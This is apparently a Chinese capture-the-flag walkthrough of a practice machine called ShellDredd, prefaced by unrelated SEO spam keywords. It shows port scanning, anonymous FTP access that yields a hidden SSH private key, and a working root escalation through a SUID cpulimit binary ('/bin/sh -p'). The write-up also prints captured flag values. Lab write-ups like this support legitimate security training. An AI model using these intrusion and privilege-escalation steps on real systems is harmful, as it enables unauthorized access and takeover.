潮州专业网站建设制作,做淘客网站备案,哈尔滨百度推广代理,广州建设信息网官网总结
getwebshell : ftp可匿名登录 → 发现隐藏文件夹 → 发现ssh密钥 → 猜解ssh用户名 → ssh密钥登录
提 权 思 路 : 发现suid权限文件 → cpulimit提权
准备工作 启动VPN 获取攻击机IP → 192.168.45.191 启动靶机 获取目标机器IP → 192.168.179.130 信息收集-端口扫…总结
getwebshell : ftp可匿名登录 → 发现隐藏文件夹 → 发现ssh密钥 → 猜解ssh用户名 → ssh密钥登录
提 权 思 路 : 发现suid权限文件 → cpulimit提权
准备工作 启动VPN 获取攻击机IP → 192.168.45.191 启动靶机 获取目标机器IP → 192.168.179.130 信息收集-端口扫描
目标开放端口收集 Nmap开放端口扫描2次(多次扫描减少误扫)
sudo nmap --min-rate 10000 -p- 192.168.179.130PORT STATE SERVICE
21/tcp open ftp
61000/tcp open unknown开放的端口-→21,61000
目标端口对应服务探测
# tcp探测
sudo nmap -sT -sV -O -sC -p21,61000 192.168.179.130PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 3.0.3
61000/tcp open ssh OpenSSH 7.9p1 Debian 10deb10u2 (protocol 2.0)探测了一下只有ftp以及ssh两个服务估计要通过信息进行爆破 信息收集-端口测试
21-FTP端口的信息收集
21-FTP版本版本信息
通过Nmap探测获得FTP的版本信息可以大致推测FTP的配置文件位置
# 探测版本为vsftpd 3.0.3,配置文件位置大致如下
/etc/vsftpd.conf21-FTP端口匿名登录测试(成功)
尝试匿名账号anonymous以及无密码进行登录测试
# 利用ftp协议ip进行连接测试
ftp 192.168.179.130
Name: anonymous21-FTP端口-文件GET收集
登录FTP之后利用ls查看存在哪些目录翻阅的同时查看一下文件权限 利用GET下载文件
# binary 以二进制模式传输文件保证文件完整
ftp → binary
# 查看目录结构
ftp → ls -al
# cd 查看存储的文件
ftp → cd .hannah
ftp → ls -al
# get 下载文件
ftp → get id_rsa21-FTP端口-PUT上传测试(失败)
测试是否可以利用PUT上传文件
# 建立一个文件尝试上传
touch text.txt
# put 上传文件
ftp → put text.txt漏洞利用-getwebshell
得到了一个id_rsa不知道是哪个用户的
base64解密获取用户名尝试
去掉id_rsa文件中的头与尾尝试base64解密 利用base64进行解密尝试
echo b3Blbn.....wBAgMEBQ| base64 -d发现没显示全决定借助网站解密 利用在线网站得到的是root #CTL{n}#CTL{n} root用户ssh密钥登录尝试(失败)
获取密钥之后指定密钥进行登录
sudo ssh -i id_rsa root 192.168.179.130 -p61000思考
尝试文件名用户
我们现在还有一个信息是之前ftp中的.hannah的文件名尝试利用文件名当用户名进行登录
# .hannah失败
sudo ssh -i id_rsa .hannah 192.168.179.130 -p61000# hannah显示id_rsa开的太大
sudo ssh -i id_rsa .hannah 192.168.179.130 -p61000修改id_rsa权限后登录成功
chmod 600 id_rsa
sudo ssh -i id_rsa .hannah 192.168.179.130 -p61000内网遨游-getshell
FLAG1获取
hannah ShellDredd:~$ find / -name local.txt 2→/dev/null
/home/hannah/local.txt
hannah ShellDredd:~$ cat /home/hannah/local.txt
7374ce9b8ccf821ef5d620418751005c信息收集-内网基础信息收集
提权的本质在于枚举在获取shell之后我们要进行内网信息的收集都是为了提权做准备
检测Linux操作系统的发行版本
较老的Ubuntu以及Linux系统可以overlayfs提权
# 确定发行版本
hannah ShellDredd:~$ lsb_release -a
No LSB modules are available.
Distributor ID: Debian
Description: Debian GNU/Linux 10 (buster)
Release: 10
Codename: buster发行版本为Debian不太能overlayfs提权
检测Linux操作系统的内核版本
较低的内核版本可以进行脏牛提权
hannah ShellDredd:~$ uname -a
Linux ShellDredd 4.19.0-10-amd64 #1 SMP Debian 4.19.132-1 (2020-07-24) x86_64 GNU/Linux内核版本为4.19.0
检测当前用户的权限
hannah ShellDredd:~$ id
uid1000(hannah) gid1000(hannah) groups1000(hannah),24(cdrom),25(floppy),29(audio),30(dip),44(video),46(plugdev),109(netdev),111(bluetooth)列举出所有的sudo文件
查找具有sudo权限且不需要密码的可提权文件 如果发现sudo -l有东西的话 访问 https://gtfobins.github.io 寻找
# 利用sudo -l寻找
hannah ShellDredd:~$ sudo -l
-bash: sudo: command not found发现不存在sudo
列举出所有suid文件
如果发现us有东西的话 访问 https://gtfobins.github.io 寻找
# -perm 文件权限
hannah ShellDredd:~$ find / -perm -us -type f 2→/dev/null
/usr/lib/eject/dmcrypt-get-device
/usr/lib/dbus-1.0/dbus-daemon-launch-helper
/usr/lib/openssh/ssh-keysign
/usr/bin/gpasswd
/usr/bin/newgrp
/usr/bin/umount
/usr/bin/mawk
/usr/bin/chfn
/usr/bin/su
/usr/bin/chsh
/usr/bin/fusermount
/usr/bin/cpulimit
/usr/bin/mount
/usr/bin/passwd权限提升
Linux提权-suid之cpulimit提权
搜索suid文件权限 发现一个不太常见的cpulimit前去搜索https://gtfobins.github.io 得到提权的命令
sudo install -m xs $(which cpulimit) .
./cpulimit -l 100 -f -- /bin/sh -p# 修改一下使用命令进行提权提权成功
hannah ShellDredd:~$ cpulimit -l 100 -f -- /bin/sh -p
Process 1145 detected
# whoami
rootFLAG2获取
cat /root/proof.txt完结撒花~ 总结
ftp的时候也要有养成查看是否存在隐藏文件的习惯
每个文件名可能都有寓意也要进行信息收集与记录 没看够~欢迎关注